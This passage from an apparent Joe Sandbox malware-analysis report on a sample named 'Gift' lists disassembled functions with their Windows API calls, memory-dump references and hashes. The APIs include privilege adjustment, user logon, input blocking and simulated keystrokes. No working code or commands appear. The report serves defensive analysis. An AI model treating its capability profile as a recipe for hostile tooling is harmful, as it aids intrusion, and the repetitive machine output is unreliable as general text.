                                                                          • Opcode Fuzzy Hash: 2ec175def26a96450139d2549f2fe8a5b010fe699865079677ad81e43bbde9cc
                                                                          • Instruction Fuzzy Hash: 8C11B2723009119BE7235F669C95E2B7BADEF84722F028529EC46D7251DB74AD018AA0
                                                                          Function 00310030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LocalTime__swprintf
                                                                          • String ID: %.3d$WIN_XPe
                                                                          • API String ID: 2070861257-2409531811
                                                                          • Opcode ID: 96e8ec7a04cbe0ed5a198304ffa63a0bbc1ef3c8a10fc6161656c2fcda55d0a6
                                                                          • Instruction ID: 5076ab1a530407e4679e20ad37bb5da1ae38b117f7294901a82947f8c36bb6da
                                                                          • Opcode Fuzzy Hash: 96e8ec7a04cbe0ed5a198304ffa63a0bbc1ef3c8a10fc6161656c2fcda55d0a6
                                                                          • Instruction Fuzzy Hash: 9DD01271814109EAC70E9B90C845DFAB37CBB0C344F104453F546A2440E6B58BDC9B22
                                                                          Function 003429BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00342AAD
                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00342AE4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                          • String ID:
                                                                          • API String ID: 599397726-0
                                                                          • Opcode ID: 619d019335c994ef67e5be3fa9af4d373229d8650a9a12f0ad87520c8a13c49a
                                                                          • Instruction ID: c919d77065a9324776225c96ae446bc853381ba1318972b6b4cbebf5233f5700
                                                                          • Opcode Fuzzy Hash: 619d019335c994ef67e5be3fa9af4d373229d8650a9a12f0ad87520c8a13c49a
                                                                          • Instruction Fuzzy Hash: 5041D371600209BFEB22DE55CC85EBBB7FCEB40754F50406EFA05BB541EAB1BE419A60
                                                                          Function 00329399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002F0FE6: std::exception::exception.LIBCMT ref: 002F101C
                                                                            • Part of subcall function 002F0FE6: __CxxThrowException@8.LIBCMT ref: 002F1031
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003293E3
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00329410
                                                                          • GetLastError.KERNEL32 ref: 0032941D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1922334811-0
                                                                          • Opcode ID: 6a3e385b1624bb4ca188d434bd00995fcfc0c371ca9b96483a96b845d93b0d72
                                                                          • Instruction ID: c0e5b7fb8c251a00a8c5bd0b46a62d65c606bee4626520213a4ca698b47fc4a8
                                                                          • Opcode Fuzzy Hash: 6a3e385b1624bb4ca188d434bd00995fcfc0c371ca9b96483a96b845d93b0d72
                                                                          • Instruction Fuzzy Hash: F81182B2414209AFD729DF64ECC6D2BB7BCFB44750B21852EE45992641EB70AC51CB60
                                                                          Function 00334254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00334271
                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003342B2
                                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003342BD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                          • String ID:
                                                                          • API String ID: 33631002-0
                                                                          • Opcode ID: 69cfba86a1728216f716d766913de7935bd3061517942f8a42edc44e82530551
                                                                          • Instruction ID: 3cba92daf31977a861f3abffefba77d55650a184513490a9e5d1c95f3b23bb25
                                                                          • Opcode Fuzzy Hash: 69cfba86a1728216f716d766913de7935bd3061517942f8a42edc44e82530551
                                                                          • Instruction Fuzzy Hash: CC115275E01228BFDB518F959C85BAFBBBCEB45B60F108555FD04F7290C6705E018BA1
                                                                          Function 00334F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00334F45
                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00334F5C
                                                                          • FreeSid.ADVAPI32(?), ref: 00334F6C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                          • String ID:
                                                                          • API String ID: 3429775523-0
                                                                          • Opcode ID: d0c2991e0b03eaade39bcbe9db69913771d2faff8d96da3bf5fc7afb928d3501
                                                                          • Instruction ID: e8cf31fc6ee9ca24a1ffd19c162bcc674190b11793c87fdea8c1fdd608bbfaf4
                                                                          • Opcode Fuzzy Hash: d0c2991e0b03eaade39bcbe9db69913771d2faff8d96da3bf5fc7afb928d3501
                                                                          • Instruction Fuzzy Hash: 55F03775A1120CBFDB05DFE09D8AAAEBBBCEB08301F0044A9E901E2180E6746A048B50
                                                                          Function 00331AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00331B01
                                                                          • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00331B14
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InputSendkeybd_event
                                                                          • String ID:
                                                                          • API String ID: 3536248340-0
                                                                          • Opcode ID: c82481f16afebcd493635464f2cef46815935db3fb77a7a4054a1deb4ac36a8a
                                                                          • Instruction ID: b47862ed75fd42df5a234bb17e26a5b5cea82ad5f2370531ce689ffb6fb041b4
                                                                          • Opcode Fuzzy Hash: c82481f16afebcd493635464f2cef46815935db3fb77a7a4054a1deb4ac36a8a
                                                                          • Instruction Fuzzy Hash: A3F0497190420DABDB05CF94C806BFEBBB8FF04315F00804AF95696292D3799615DF94
                                                                          Function 0033A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00349B52,?,0036098C,?), ref: 0033A6DA
                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00349B52,?,0036098C,?), ref: 0033A6EC
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatLastMessage
                                                                          • String ID:
                                                                          • API String ID: 3479602957-0
                                                                          • Opcode ID: 25973f3dd1ac8a1efca186e90849ddb29b1b012e7e747aa7acfb7b3ed80b6737
                                                                          • Instruction ID: c54a83f603718bae5535394ccfa38ec86b038a2d269e672c864804e31a517c04
                                                                          • Opcode Fuzzy Hash: 25973f3dd1ac8a1efca186e90849ddb29b1b012e7e747aa7acfb7b3ed80b6737
                                                                          • Instruction Fuzzy Hash: 9AF0E23500422DBBDB22AFA4CC89FEA376CAF08361F008165F80896290D6709940CBA1
                                                                          Function 00328DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00328F27), ref: 00328DFE
                                                                          • CloseHandle.KERNEL32(?,?,00328F27), ref: 00328E10
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                          • String ID:
                                                                          • API String ID: 81990902-0
                                                                          • Opcode ID: 524ba3669e45cee04bbd912d2f991c0c4e65291d448625c27391e9c4c0fb6f8f
                                                                          • Instruction ID: 05ac69dca6cefbdf11f2ebee88ffba50d1a286f7201150c62a18f48784f06c93
                                                                          • Opcode Fuzzy Hash: 524ba3669e45cee04bbd912d2f991c0c4e65291d448625c27391e9c4c0fb6f8f
                                                                          • Instruction Fuzzy Hash: 00E0BF76014611EFE7272B60EC09D77B7ADEB04351B15892DF95580570DB626CA0DB50
                                                                          Function 002FA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,002F8F87,?,?,?,00000001), ref: 002FA38A
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002FA393
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 66bcb1a778a16933db9fcd61bf08440b49b0a033967d79d0061b0c63d1854c55
                                                                          • Instruction ID: a0e601ba3fefaf3befe6fb2c80d5f72070ab4b0d63be7d793a8937450433b39b
                                                                          • Opcode Fuzzy Hash: 66bcb1a778a16933db9fcd61bf08440b49b0a033967d79d0061b0c63d1854c55
                                                                          • Instruction Fuzzy Hash: 93B09235064208ABCA462B91EC0AB8A3F6CEB44B63F108010F64D44260EBE254508A91
                                                                          Function 003445D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • BlockInput.USER32(00000001), ref: 003445F0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BlockInput
                                                                          • String ID:
                                                                          • API String ID: 3456056419-0
                                                                          • Opcode ID: 91c22217c04808f270623e53ab7961c34eb257340b85874eabeaae2aeb96c10c
                                                                          • Instruction ID: eb9c1f29a004d3c003b50e138c4ee1d9992aa2dfd0c8e2e53102e335f488a9d0
                                                                          • Opcode Fuzzy Hash: 91c22217c04808f270623e53ab7961c34eb257340b85874eabeaae2aeb96c10c
                                                                          • Instruction Fuzzy Hash: 1CE09A312102159FD701AF59E800A9AB7ECEF98760F008426F809DB350DAB0BD008B90
                                                                          Function 003351E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00335205
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: mouse_event
                                                                          • String ID:
                                                                          • API String ID: 2434400541-0
                                                                          • Opcode ID: fa7d93f4f71976d8d86d5ff55682aecd11978fd22a79d53638206df074491230
                                                                          • Instruction ID: 544a150d3ce5e89e3d07f4eb0d86101e35d60d069e6126dc7f484bc00768c642
                                                                          • Opcode Fuzzy Hash: fa7d93f4f71976d8d86d5ff55682aecd11978fd22a79d53638206df074491230
                                                                          • Instruction Fuzzy Hash: 6AD092A5964E0A79ED5A07249E9FF77160CE3017C1F968749B142C94C3ECD46885A432
                                                                          Function 00329369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00328FA7), ref: 00329389
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LogonUser
                                                                          • String ID:
                                                                          • API String ID: 1244722697-0
                                                                          • Opcode ID: f9e2e95b0a533f3d8da8948db9954039828b1a9f4df7968460fb65286612e116
                                                                          • Instruction ID: 662e39fc6a43389eda1b9e7bf99102b0808e8af2ab3c2930830b0e9c69c3ec7b
                                                                          • Opcode Fuzzy Hash: f9e2e95b0a533f3d8da8948db9954039828b1a9f4df7968460fb65286612e116
                                                                          • Instruction Fuzzy Hash: B6D05E3226050EBBEF028EA4DD02EAF3B69EB04B01F408111FE15C50A0C775D835AB60
                                                                          Function 00310722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00310734
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: 040f002e5d784558ad7f5ff69586e7c314ac3aa8f2b35650fc9b621d6f498f00
                                                                          • Instruction ID: e4cf35a7ef0f1668d1b9f134015180224fd67ff13d7870266b103c02242bf8a2
                                                                          • Opcode Fuzzy Hash: 040f002e5d784558ad7f5ff69586e7c314ac3aa8f2b35650fc9b621d6f498f00
                                                                          • Instruction Fuzzy Hash: E3C04CF1800109DBCB0ADBA0D988EEF77BCBB08304F104455E145B2100D7B49B848A71
                                                                          Function 002FA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 002FA35A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 4fed4238d7d2d9fe7b2bdf45e958069cc2e7db06962aa26b49cb13ce571dfdba
                                                                          • Instruction ID: 67377b35579a50044f7d16cf43ddbfe96a16736536bf44f535dff867383d56da
                                                                          • Opcode Fuzzy Hash: 4fed4238d7d2d9fe7b2bdf45e958069cc2e7db06962aa26b49cb13ce571dfdba
                                                                          • Instruction Fuzzy Hash: DAA0243001010CF7CF011F41FC054457F5CD700351F00C010F40C00131D773541045C0
                                                                          Function 00353BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,00360980), ref: 00353C65
                                                                          • IsWindowVisible.USER32(?), ref: 00353C89
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpperVisibleWindow
                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                          • API String ID: 4105515805-45149045
                                                                          • Opcode ID: 2b46e650074d5fc3f86671d3da912092279b132bdaa0dabc9409c5a3238bcbde
                                                                          • Instruction ID: 1e12f432171dccd3be9f06e74dcd5829f2e1641fe0fecca12636efac2ea8d2aa
                                                                          • Opcode Fuzzy Hash: 2b46e650074d5fc3f86671d3da912092279b132bdaa0dabc9409c5a3238bcbde
                                                                          • Instruction Fuzzy Hash: 9ED19D302143148BDB16EF10D491E6AB7A5EF88394F204869FD865B2F3CB31EE5ACB51
                                                                          Function 0035ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0035AC55
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0035AC86
                                                                          • GetSysColor.USER32(0000000F), ref: 0035AC92
                                                                          • SetBkColor.GDI32(?,000000FF), ref: 0035ACAC
                                                                          • SelectObject.GDI32(?,?), ref: 0035ACBB
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0035ACE6
                                                                          • GetSysColor.USER32(00000010), ref: 0035ACEE
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0035ACF5
                                                                          • FrameRect.USER32(?,?,00000000), ref: 0035AD04
                                                                          • DeleteObject.GDI32(00000000), ref: 0035AD0B
                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0035AD56
                                                                          • FillRect.USER32(?,?,?), ref: 0035AD88
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0035ADB3
                                                                            • Part of subcall function 0035AF18: GetSysColor.USER32(00000012), ref: 0035AF51
                                                                            • Part of subcall function 0035AF18: SetTextColor.GDI32(?,?), ref: 0035AF55
                                                                            • Part of subcall function 0035AF18: GetSysColorBrush.USER32(0000000F), ref: 0035AF6B
                                                                            • Part of subcall function 0035AF18: GetSysColor.USER32(0000000F), ref: 0035AF76
                                                                            • Part of subcall function 0035AF18: GetSysColor.USER32(00000011), ref: 0035AF93
                                                                            • Part of subcall function 0035AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0035AFA1
                                                                            • Part of subcall function 0035AF18: SelectObject.GDI32(?,00000000), ref: 0035AFB2
                                                                            • Part of subcall function 0035AF18: SetBkColor.GDI32(?,00000000), ref: 0035AFBB
                                                                            • Part of subcall function 0035AF18: SelectObject.GDI32(?,?), ref: 0035AFC8
                                                                            • Part of subcall function 0035AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0035AFE7
                                                                            • Part of subcall function 0035AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0035AFFE
                                                                            • Part of subcall function 0035AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0035B013
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
